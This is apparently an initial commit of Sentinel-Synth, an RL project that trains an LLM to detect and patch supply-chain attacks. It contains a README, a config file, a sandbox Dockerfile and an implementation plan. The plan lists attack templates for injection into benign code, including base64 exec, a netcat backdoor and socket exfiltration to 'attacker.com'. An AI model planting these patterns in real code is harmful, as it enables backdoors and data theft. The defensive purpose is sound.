Spaces:
Running
Running
added inital
Browse files- README.md +118 -1
- config.yaml +28 -0
- docker/Dockerfile.sandbox +5 -0
- docs/implementation +277 -0
- requirements.txt +15 -0
- sentinel_synth/__init__.py +0 -0
- sentinel_synth/config.py +80 -0
- sentinel_synth/dashboard/__init__.py +0 -0
- sentinel_synth/dashboard/app.py +169 -0
- sentinel_synth/data/__init__.py +0 -0
- sentinel_synth/data/benign/ds_binarysearch.py +13 -0
- sentinel_synth/data/benign/ds_linkedlist.py +19 -0
- sentinel_synth/data/benign/ds_queue.py +15 -0
- sentinel_synth/data/benign/ds_sorting.py +8 -0
- sentinel_synth/data/benign/ds_stack.py +15 -0
- sentinel_synth/data/benign/io_config.py +15 -0
- sentinel_synth/data/benign/io_csv.py +11 -0
- sentinel_synth/data/benign/io_json.py +5 -0
- sentinel_synth/data/benign/io_log.py +8 -0
- sentinel_synth/data/benign/io_template.py +6 -0
- sentinel_synth/data/benign/math_factorial.py +5 -0
- sentinel_synth/data/benign/math_fibonacci.py +7 -0
- sentinel_synth/data/benign/math_gcd.py +5 -0
- sentinel_synth/data/benign/math_matrix.py +3 -0
- sentinel_synth/data/benign/math_prime.py +8 -0
- sentinel_synth/data/benign/misc_calc.py +13 -0
- sentinel_synth/data/benign/misc_date.py +3 -0
- sentinel_synth/data/benign/misc_password.py +8 -0
- sentinel_synth/data/benign/misc_temp.py +7 -0
- sentinel_synth/data/benign/misc_url.py +11 -0
- sentinel_synth/data/benign/str_anagram.py +3 -0
- sentinel_synth/data/benign/str_caesar.py +10 -0
- sentinel_synth/data/benign/str_palindrome.py +4 -0
- sentinel_synth/data/benign/str_slug.py +6 -0
- sentinel_synth/data/benign/str_wordcount.py +7 -0
- sentinel_synth/data/generate_scenarios.py +253 -0
- sentinel_synth/data/scenarios.json +402 -0
- sentinel_synth/data/sdk_config.yaml +33 -0
- sentinel_synth/envs/__init__.py +0 -0
- sentinel_synth/envs/sentinel_env.py +175 -0
- sentinel_synth/tests/__init__.py +0 -0
- sentinel_synth/tests/test_validator.py +57 -0
- sentinel_synth/training/__init__.py +0 -0
- sentinel_synth/training/train_grpo.py +187 -0
- sentinel_synth/validation/__init__.py +0 -0
- sentinel_synth/validation/docker_runner.py +107 -0
- sentinel_synth/validation/patch_validator.py +87 -0
- setup.py +15 -0
README.md
CHANGED
|
@@ -1 +1,118 @@
|
|
| 1 |
-
#
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# 🦅 Sentinel-Synth: Autonomous Supply-Chain Guard
|
| 2 |
+
|
| 3 |
+
**Sentinel-Synth** is an advanced Reinforcement Learning (RL) platform designed for the detection, analysis, and automated patching of software supply-chain vulnerabilities. It leverages **Group Relative Policy Optimization (GRPO)** and **Meta's Synthetic Data Kit** to train fine-tuned LLM agents that can secure CI/CD pipelines autonomously.
|
| 4 |
+
|
| 5 |
+
---
|
| 6 |
+
|
| 7 |
+
## 🏗 System Architecture
|
| 8 |
+
|
| 9 |
+
The Sentinel-Synth ecosystem is built on four functional pillars:
|
| 10 |
+
|
| 11 |
+
```mermaid
|
| 12 |
+
graph TD
|
| 13 |
+
A[Meta SDK / Mutation Engine] -->|Synthetic Scenarios| B[Scenarios JSON]
|
| 14 |
+
B --> C[Gymnasium RL Environment]
|
| 15 |
+
C -->|Observations| D[GRPO Policy Agent (Qwen2.5-Coder)]
|
| 16 |
+
D -->|Actions| C
|
| 17 |
+
C -->|Validation| E[Docker Sandbox & Patch Validator]
|
| 18 |
+
E -->|Reward Signal| D
|
| 19 |
+
D -->|Metrics| F[W&B / Dashboard]
|
| 20 |
+
```
|
| 21 |
+
|
| 22 |
+
### Core Components
|
| 23 |
+
- **`sentinel_synth.data`**: Orchestrates scenario synthesis using Meta's `synthetic-data-kit` (Track A) and a custom mutation engine (Track B).
|
| 24 |
+
- **`sentinel_synth.envs`**: A `gymnasium` environment that formalizes DevSecOps tasks into an RL problem.
|
| 25 |
+
- **`sentinel_synth.validation`**: A two-tiered execution engine that uses isolated Docker containers for syntax checking and re-attack verification.
|
| 26 |
+
- **`sentinel_synth.training`**: The training loop using `trl` and `unsloth` for efficient GRPO fine-tuning.
|
| 27 |
+
|
| 28 |
+
---
|
| 29 |
+
|
| 30 |
+
## 🚀 Getting Started
|
| 31 |
+
|
| 32 |
+
### 1. Prerequisites
|
| 33 |
+
- **Python 3.10+** (3.11 recommended)
|
| 34 |
+
- **Docker** (Ensure your user has permission to manage containers)
|
| 35 |
+
- **vLLM Server** (Optional, for Track A synthetic data generation)
|
| 36 |
+
- **GPU** (NVIDIA/AMD) for standard training; CPU supported for dry-runs.
|
| 37 |
+
|
| 38 |
+
### 2. Installation
|
| 39 |
+
```bash
|
| 40 |
+
# Set up a virtual environment (recommended)
|
| 41 |
+
python3 -m venv venv
|
| 42 |
+
source venv/bin/activate
|
| 43 |
+
|
| 44 |
+
# Install the base system
|
| 45 |
+
pip install -r requirements.txt
|
| 46 |
+
pip install -e .
|
| 47 |
+
|
| 48 |
+
# Build the sandbox Docker image
|
| 49 |
+
docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
|
| 50 |
+
```
|
| 51 |
+
|
| 52 |
+
### 3. Configuration
|
| 53 |
+
Copy the sample environment file and adjust your settings:
|
| 54 |
+
```bash
|
| 55 |
+
cp .env.example .env # Define model paths, W&B keys, etc.
|
| 56 |
+
```
|
| 57 |
+
Edit `config.yaml` to tune training hyperparameters and environment thresholds.
|
| 58 |
+
|
| 59 |
+
---
|
| 60 |
+
|
| 61 |
+
## 🧪 Detailed Workflow
|
| 62 |
+
|
| 63 |
+
### 📤 Phase 1: Data Generation & Analysis
|
| 64 |
+
Sentinel-Synth generates diverse training scenarios including Typosquatting, Obfuscated Exec, and Subprocess Backdoors.
|
| 65 |
+
|
| 66 |
+
**Using Meta's Synthetic Data Kit (Track A):**
|
| 67 |
+
1. Ensure a vLLM server is running.
|
| 68 |
+
2. Configure `sentinel_synth/data/sdk_config.yaml`.
|
| 69 |
+
3. Run the generator:
|
| 70 |
+
```bash
|
| 71 |
+
python3 -m sentinel_synth.data.generate_scenarios --use-sdk --output data/scenarios.json
|
| 72 |
+
```
|
| 73 |
+
|
| 74 |
+
**Using the Mutation Engine (Track B):**
|
| 75 |
+
This mode takes benign code and injects malicious patterns deterministically.
|
| 76 |
+
```bash
|
| 77 |
+
python3 -m sentinel_synth.data.generate_scenarios --output data/scenarios.json
|
| 78 |
+
```
|
| 79 |
+
|
| 80 |
+
---
|
| 81 |
+
|
| 82 |
+
### 🧠 Phase 2: Agent Training (GRPO)
|
| 83 |
+
Train the `Qwen2.5-Coder-7B` model using the novel Group Relative Policy Optimization algorithm. GRPO allows the agent to learn complex decision-making without a value model.
|
| 84 |
+
|
| 85 |
+
**Dry-Run (Pipeline Validation):**
|
| 86 |
+
Test the logic on CPU without a GPU:
|
| 87 |
+
```bash
|
| 88 |
+
python3 -m sentinel_synth.training.train_grpo --dry-run
|
| 89 |
+
```
|
| 90 |
+
|
| 91 |
+
**Full Training:**
|
| 92 |
+
```bash
|
| 93 |
+
# Ensure WANDB is logged in or API key is in .env
|
| 94 |
+
python3 -m sentinel_synth.training.train_grpo --use-docker
|
| 95 |
+
```
|
| 96 |
+
*The agent receives rewards based on: valid detection (+1.5), successful patching (+4.0), and avoiding false positives (-2.0).*
|
| 97 |
+
|
| 98 |
+
---
|
| 99 |
+
|
| 100 |
+
### 🛡 Phase 3: Validation & Sandbox Execution
|
| 101 |
+
Every patch proposed by the agent is autonomously validated in a secure Docker sandbox:
|
| 102 |
+
1. **Syntax Check**: Ensuring the code is parseable.
|
| 103 |
+
2. **Functional Test**: Running units tests from `scenarios.json`.
|
| 104 |
+
3. **Re-Attack Verification**: The system re-executes the vulnerability payload to verify the patch actually neutralized the threat (e.g., checking if suspicious file writes or network calls stopped).
|
| 105 |
+
|
| 106 |
+
---
|
| 107 |
+
|
| 108 |
+
## 📊 Monitoring & UI
|
| 109 |
+
- **Weights & Biases**: Real-time tracking of mean rewards, action distributions, and loss curves.
|
| 110 |
+
- **Streamlit Dashboard**: A professional interface for interactive analysis:
|
| 111 |
+
```bash
|
| 112 |
+
streamlit run sentinel_synth/dashboard/app.py
|
| 113 |
+
```
|
| 114 |
+
|
| 115 |
+
---
|
| 116 |
+
|
| 117 |
+
## 📄 License
|
| 118 |
+
Sentinel-Synth is licensed under the Apache 2.0 License. See the LICENSE file for details.
|
config.yaml
ADDED
|
@@ -0,0 +1,28 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# ============================================================
|
| 2 |
+
# Sentinel-Synth Training & Pipeline Configuration
|
| 3 |
+
# All tunable hyperparameters live here
|
| 4 |
+
# ============================================================
|
| 5 |
+
|
| 6 |
+
data_generation:
|
| 7 |
+
num_samples: 10
|
| 8 |
+
output_format: "json"
|
| 9 |
+
benign_dir: "sentinel_synth/data/benign/"
|
| 10 |
+
scenarios_output: "sentinel_synth/data/scenarios.json"
|
| 11 |
+
sdk_config: "sentinel_synth/data/sdk_config.yaml"
|
| 12 |
+
|
| 13 |
+
training:
|
| 14 |
+
learning_rate: 0.000001
|
| 15 |
+
group_size: 4
|
| 16 |
+
max_seq_len: 1024
|
| 17 |
+
max_steps: 100
|
| 18 |
+
gradient_accumulation_steps: 4
|
| 19 |
+
ppo_clip_eps: 0.2
|
| 20 |
+
lora_r: 16
|
| 21 |
+
lora_alpha: 16
|
| 22 |
+
lora_dropout: 0
|
| 23 |
+
output_dir: "grpo_lora"
|
| 24 |
+
|
| 25 |
+
environment:
|
| 26 |
+
max_steps: 5
|
| 27 |
+
use_docker: false
|
| 28 |
+
sandbox_timeout_sec: 5
|
docker/Dockerfile.sandbox
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
FROM python:3.11-slim
|
| 2 |
+
RUN useradd -m sandbox
|
| 3 |
+
USER sandbox
|
| 4 |
+
WORKDIR /app
|
| 5 |
+
CMD ["python", "script.py"]
|
docs/implementation
ADDED
|
@@ -0,0 +1,277 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Sentinel-Synth Phase 1 — Implementation Plan
|
| 2 |
+
|
| 3 |
+
## Goal
|
| 4 |
+
|
| 5 |
+
Build the complete Sentinel-Synth system: an RL-based supply-chain attack detection platform with synthetic data generation, a Gymnasium environment, Docker-sandboxed validation, GRPO training (Unsloth + W&B), and a Streamlit dashboard.
|
| 6 |
+
|
| 7 |
+
## Project Structure
|
| 8 |
+
|
| 9 |
+
```
|
| 10 |
+
PatchHawk/
|
| 11 |
+
├── sentinel_synth/
|
| 12 |
+
│ ├── __init__.py
|
| 13 |
+
│ ├── envs/
|
| 14 |
+
│ │ ├── __init__.py
|
| 15 |
+
│ │ └── sentinel_env.py # Gymnasium RL environment
|
| 16 |
+
│ ├── data/
|
| 17 |
+
│ │ ├── __init__.py
|
| 18 |
+
│ │ ├── generate_scenarios.py # Synthetic data pipeline
|
| 19 |
+
│ │ ├── benign/ # 20-30 benign Python files
|
| 20 |
+
│ │ └── scenarios.json # Generated dataset (output)
|
| 21 |
+
│ ├── validation/
|
| 22 |
+
│ │ ├── __init__.py
|
| 23 |
+
│ │ ├── docker_runner.py # Docker sandbox execution
|
| 24 |
+
│ │ └── patch_validator.py # 3-step patch validation
|
| 25 |
+
│ ├── training/
|
| 26 |
+
│ │ ├── __init__.py
|
| 27 |
+
│ │ └── train_grpo.py # GRPO + Unsloth + W&B training
|
| 28 |
+
│ ├── dashboard/
|
| 29 |
+
│ │ └── app.py # Streamlit demo UI
|
| 30 |
+
│ └── tests/
|
| 31 |
+
│ ├── __init__.py
|
| 32 |
+
│ └── test_validator.py # Unit tests for validator
|
| 33 |
+
├── docker/
|
| 34 |
+
│ └── Dockerfile.sandbox # Lightweight Python sandbox
|
| 35 |
+
├── requirements.txt
|
| 36 |
+
├── setup.py
|
| 37 |
+
└── README.md
|
| 38 |
+
```
|
| 39 |
+
|
| 40 |
+
---
|
| 41 |
+
|
| 42 |
+
## Proposed Changes
|
| 43 |
+
|
| 44 |
+
### Component 1: Benign Code Corpus (`sentinel_synth/data/benign/`)
|
| 45 |
+
|
| 46 |
+
#### [NEW] 25 benign Python files
|
| 47 |
+
|
| 48 |
+
Create 25 small, self-contained Python files that serve as the benign corpus for mutation. Categories:
|
| 49 |
+
- **Math utilities** (5): fibonacci, factorial, prime check, gcd, matrix ops
|
| 50 |
+
- **String utilities** (5): palindrome, anagram, caesar cipher, word count, slug generator
|
| 51 |
+
- **Data structures** (5): stack, queue, linked list, binary search, sorting
|
| 52 |
+
- **File/IO utilities** (5): CSV parser, JSON formatter, config reader, log parser, template engine
|
| 53 |
+
- **Misc** (5): temperature converter, password validator, date formatter, calculator, URL parser
|
| 54 |
+
|
| 55 |
+
Each file exports a main function with docstring and is testable with simple assertions.
|
| 56 |
+
|
| 57 |
+
---
|
| 58 |
+
|
| 59 |
+
### Component 2: Synthetic Data Generator (`sentinel_synth/data/generate_scenarios.py`)
|
| 60 |
+
|
| 61 |
+
#### [NEW] [generate_scenarios.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/data/generate_scenarios.py)
|
| 62 |
+
|
| 63 |
+
**Key design decisions:**
|
| 64 |
+
- **Track A (Meta synthetic-data-kit)**: Will be implemented as a pluggable module. Since it requires a running vLLM server with Llama 3 8B, the generator will have a `--use-sdk` flag. When disabled, it generates SDK-style examples from hardcoded templates (for offline/demo use).
|
| 65 |
+
- **Track B (Mutation engine)**: Deterministic mutation of benign files using 8 attack templates.
|
| 66 |
+
- Output: `scenarios.json` with 50+ entries.
|
| 67 |
+
|
| 68 |
+
**Attack templates (8):**
|
| 69 |
+
1. Typosquatting import (`import pythonn`)
|
| 70 |
+
2. Obfuscated exec (`exec(base64.b64decode(...))`)
|
| 71 |
+
3. Environment variable hijack (`os.environ['PATH'] = '/tmp'`)
|
| 72 |
+
4. Subprocess backdoor (`subprocess.call(['nc', ...])`)
|
| 73 |
+
5. Pickle deserialization (`pickle.loads(untrusted)`)
|
| 74 |
+
6. Hidden eval in decorator (`eval(user_input)`)
|
| 75 |
+
7. Socket exfiltration (`socket.connect(('attacker.com', 80))`)
|
| 76 |
+
8. Malicious `__import__` (`__import__('os').system('...')`)
|
| 77 |
+
|
| 78 |
+
**Scenario JSON schema:**
|
| 79 |
+
```json
|
| 80 |
+
{
|
| 81 |
+
"id": "tp_001",
|
| 82 |
+
"type": "true_positive|false_positive|functional",
|
| 83 |
+
"code_snippet": "...",
|
| 84 |
+
"patch": "...|null",
|
| 85 |
+
"unit_test_code": "...|null",
|
| 86 |
+
"label": "malicious|benign",
|
| 87 |
+
"source": "mutation_engine|synthetic_data_kit|manual",
|
| 88 |
+
"attack_type": "typosquatting|obfuscated_exec|...|null"
|
| 89 |
+
}
|
| 90 |
+
```
|
| 91 |
+
|
| 92 |
+
---
|
| 93 |
+
|
| 94 |
+
### Component 3: Docker Sandbox (`docker/Dockerfile.sandbox` + `sentinel_synth/validation/docker_runner.py`)
|
| 95 |
+
|
| 96 |
+
#### [NEW] [Dockerfile.sandbox](file:///home/ram/Ram/repos/PatchHawk/docker/Dockerfile.sandbox)
|
| 97 |
+
|
| 98 |
+
Minimal Python 3.11-slim image with non-root user, no network, memory/CPU limits.
|
| 99 |
+
|
| 100 |
+
#### [NEW] [docker_runner.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/docker_runner.py)
|
| 101 |
+
|
| 102 |
+
- `run_in_docker(code, timeout_sec=5)` → `{"stdout", "stderr", "exit_code", "network_blocked", "file_writes"}`
|
| 103 |
+
- Uses `docker` Python SDK for container management
|
| 104 |
+
- Automatic temp directory cleanup
|
| 105 |
+
- Graceful container kill on timeout
|
| 106 |
+
|
| 107 |
+
---
|
| 108 |
+
|
| 109 |
+
### Component 4: Patch Validator (`sentinel_synth/validation/patch_validator.py`)
|
| 110 |
+
|
| 111 |
+
#### [NEW] [patch_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/patch_validator.py)
|
| 112 |
+
|
| 113 |
+
Three-step validation pipeline:
|
| 114 |
+
1. **Syntax check**: `py_compile` in Docker
|
| 115 |
+
2. **Unit test execution**: Run scenario's `unit_test_code` against patched code in Docker
|
| 116 |
+
3. **Re-attack verification**: Confirm vulnerability is neutralized by comparing original vs. patched execution telemetry
|
| 117 |
+
|
| 118 |
+
Returns `(bool, str, dict)` — (passed, message, details).
|
| 119 |
+
|
| 120 |
+
---
|
| 121 |
+
|
| 122 |
+
### Component 5: Gymnasium Environment (`sentinel_synth/envs/sentinel_env.py`)
|
| 123 |
+
|
| 124 |
+
#### [NEW] [sentinel_env.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/envs/sentinel_env.py)
|
| 125 |
+
|
| 126 |
+
- Inherits `gymnasium.Env`
|
| 127 |
+
- **Observation space**: `Dict` with `code_snippet` (Text), `static_flags` (Box[5]), `risk_score` (Box[1])
|
| 128 |
+
- **Action space**: `Discrete(5)` — ANALYZE, EXECUTE_SANDBOX, BLOCK_PR, SUBMIT_PATCH, REQUEST_REVIEW
|
| 129 |
+
- `max_steps = 5`
|
| 130 |
+
- `reset()`: Random scenario selection, compute static flags + risk score
|
| 131 |
+
- `step(action)`: Full reward logic per spec (BLOCK=+2/-1, PATCH=+3/-1.5/-1, etc.)
|
| 132 |
+
- Integrates `docker_runner` and `patch_validator`
|
| 133 |
+
|
| 134 |
+
---
|
| 135 |
+
|
| 136 |
+
### Component 6: GRPO Training (`sentinel_synth/training/train_grpo.py`)
|
| 137 |
+
|
| 138 |
+
#### [NEW] [train_grpo.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/training/train_grpo.py)
|
| 139 |
+
|
| 140 |
+
- Load `Qwen2.5-Coder-7B` via Unsloth in 4-bit with LoRA
|
| 141 |
+
- Custom reward function that runs full environment trajectory
|
| 142 |
+
- `GRPOTrainer` from `trl` with group_size=4
|
| 143 |
+
- **W&B integration**: Log per-epoch metrics (mean reward, action distribution, patch success rate, loss)
|
| 144 |
+
- Hyperparameters: `lr=1e-6`, `group_size=4`, `ppo_clip_eps=0.2`, `max_seq_length=1024`
|
| 145 |
+
- Output: LoRA adapter to `./grpo_lora/`
|
| 146 |
+
|
| 147 |
+
> [!IMPORTANT]
|
| 148 |
+
> The training script requires GPU access (MI300X target) and a significant amount of VRAM for even the 4-bit model. During development, we'll include a `--dry-run` mode that validates the pipeline without actually training.
|
| 149 |
+
|
| 150 |
+
---
|
| 151 |
+
|
| 152 |
+
### Component 7: Streamlit Dashboard (`sentinel_synth/dashboard/app.py`)
|
| 153 |
+
|
| 154 |
+
#### [NEW] [app.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/dashboard/app.py)
|
| 155 |
+
|
| 156 |
+
- Code input text area
|
| 157 |
+
- "Analyze" button triggers environment run
|
| 158 |
+
- Display panels: Agent decision, Patch code, Validation result, Docker telemetry
|
| 159 |
+
- Demo mode with pre-loaded examples (1 malicious, 1 benign)
|
| 160 |
+
- Dark-themed UI with Cobalt Blue accent colors
|
| 161 |
+
- W&B run link display
|
| 162 |
+
|
| 163 |
+
---
|
| 164 |
+
|
| 165 |
+
### Component 8: Tests (`sentinel_synth/tests/test_validator.py`)
|
| 166 |
+
|
| 167 |
+
#### [NEW] [test_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/tests/test_validator.py)
|
| 168 |
+
|
| 169 |
+
4 test cases using pytest:
|
| 170 |
+
1. `test_syntax_error_detected` — patch with syntax error → `(False, "Syntax error", ...)`
|
| 171 |
+
2. `test_unit_test_pass` — correct patch → `(True, "Patch is valid", ...)`
|
| 172 |
+
3. `test_unit_test_fail` — broken patch → `(False, "Unit test failed", ...)`
|
| 173 |
+
4. `test_vulnerability_remains` — incomplete patch → `(False, "Vulnerability remains", ...)`
|
| 174 |
+
|
| 175 |
+
---
|
| 176 |
+
|
| 177 |
+
### Component 9: Project Configuration
|
| 178 |
+
|
| 179 |
+
#### [NEW] [requirements.txt](file:///home/ram/Ram/repos/PatchHawk/requirements.txt)
|
| 180 |
+
|
| 181 |
+
```
|
| 182 |
+
gymnasium>=0.29.0
|
| 183 |
+
docker>=7.0.0
|
| 184 |
+
streamlit>=1.30.0
|
| 185 |
+
unsloth>=2024.0
|
| 186 |
+
trl>=0.7.0
|
| 187 |
+
transformers>=4.38.0
|
| 188 |
+
torch>=2.1.0
|
| 189 |
+
wandb>=0.16.0
|
| 190 |
+
pytest>=8.0.0
|
| 191 |
+
peft>=0.8.0
|
| 192 |
+
datasets>=2.16.0
|
| 193 |
+
```
|
| 194 |
+
|
| 195 |
+
#### [NEW] [setup.py](file:///home/ram/Ram/repos/PatchHawk/setup.py)
|
| 196 |
+
|
| 197 |
+
Standard setuptools configuration registering `sentinel_synth` as a package.
|
| 198 |
+
|
| 199 |
+
#### [MODIFY] [README.md](file:///home/ram/Ram/repos/PatchHawk/README.md)
|
| 200 |
+
|
| 201 |
+
Full project documentation with architecture diagram, setup instructions, usage guide, and data flow.
|
| 202 |
+
|
| 203 |
+
---
|
| 204 |
+
|
| 205 |
+
## User Review Required
|
| 206 |
+
|
| 207 |
+
> [!IMPORTANT]
|
| 208 |
+
> **vLLM / Llama 3 dependency**: Track A of the data generator requires a running vLLM server with Llama 3 8B. Should I:
|
| 209 |
+
> - (A) Implement it with a fallback to template-based generation when the server is unavailable?
|
| 210 |
+
> - (B) Skip Track A entirely for Phase 1 and use only the mutation engine (Track B) + manual templates?
|
| 211 |
+
|
| 212 |
+
> [!IMPORTANT]
|
| 213 |
+
> **Docker requirement**: The sandbox and validator require Docker to be installed and the current user to have Docker permissions. Should I add a `--no-docker` mode that simulates sandbox execution for development/testing without Docker?
|
| 214 |
+
|
| 215 |
+
> [!WARNING]
|
| 216 |
+
> **W&B API key**: The training script needs a W&B API key. I'll use `wandb.login()` which reads from `WANDB_API_KEY` env var or prompts interactively. Is this acceptable?
|
| 217 |
+
|
| 218 |
+
---
|
| 219 |
+
|
| 220 |
+
## Open Questions
|
| 221 |
+
|
| 222 |
+
1. **GPU availability**: Is the MI300X available now for testing the training script, or should I focus on making the pipeline work with `--dry-run` first?
|
| 223 |
+
2. **Benign corpus**: Should I create the 25 benign Python files from scratch (my plan), or do you have an existing corpus to use?
|
| 224 |
+
3. **synthetic-data-kit version**: Which version of Meta's synthetic-data-kit should I target? The API may have changed.
|
| 225 |
+
|
| 226 |
+
---
|
| 227 |
+
|
| 228 |
+
## Verification Plan
|
| 229 |
+
|
| 230 |
+
### Automated Tests
|
| 231 |
+
```bash
|
| 232 |
+
# 1. Generate scenarios
|
| 233 |
+
python -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
|
| 234 |
+
|
| 235 |
+
# 2. Validate scenarios.json has 50+ entries
|
| 236 |
+
python -c "import json; d=json.load(open('sentinel_synth/data/scenarios.json')); assert len(d)>=50"
|
| 237 |
+
|
| 238 |
+
# 3. Build Docker sandbox image
|
| 239 |
+
docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
|
| 240 |
+
|
| 241 |
+
# 4. Run unit tests
|
| 242 |
+
pytest sentinel_synth/tests/test_validator.py -v
|
| 243 |
+
|
| 244 |
+
# 5. Test environment with gym checker
|
| 245 |
+
python -c "import gymnasium; from sentinel_synth.envs.sentinel_env import SentinelEnv; env=SentinelEnv(); gymnasium.utils.env_checker.check_env(env)"
|
| 246 |
+
|
| 247 |
+
# 6. Dry-run training
|
| 248 |
+
python -m sentinel_synth.training.train_grpo --dry-run
|
| 249 |
+
|
| 250 |
+
# 7. Launch dashboard
|
| 251 |
+
streamlit run sentinel_synth/dashboard/app.py
|
| 252 |
+
```
|
| 253 |
+
|
| 254 |
+
### Manual Verification
|
| 255 |
+
- Verify Docker containers are properly isolated (no network, memory limits)
|
| 256 |
+
- Verify W&B dashboard shows training metrics
|
| 257 |
+
- Verify Streamlit dashboard renders correctly with demo examples
|
| 258 |
+
|
| 259 |
+
---
|
| 260 |
+
|
| 261 |
+
## Execution Order
|
| 262 |
+
|
| 263 |
+
```mermaid
|
| 264 |
+
graph TD
|
| 265 |
+
A[1. Project scaffolding + requirements] --> B[2. Benign corpus - 25 files]
|
| 266 |
+
B --> C[3. Data generator + scenarios.json]
|
| 267 |
+
A --> D[4. Dockerfile.sandbox]
|
| 268 |
+
D --> E[5. docker_runner.py]
|
| 269 |
+
E --> F[6. patch_validator.py]
|
| 270 |
+
C --> G[7. sentinel_env.py]
|
| 271 |
+
F --> G
|
| 272 |
+
G --> H[8. train_grpo.py + W&B]
|
| 273 |
+
F --> I[9. test_validator.py]
|
| 274 |
+
H --> J[10. Streamlit dashboard]
|
| 275 |
+
G --> J
|
| 276 |
+
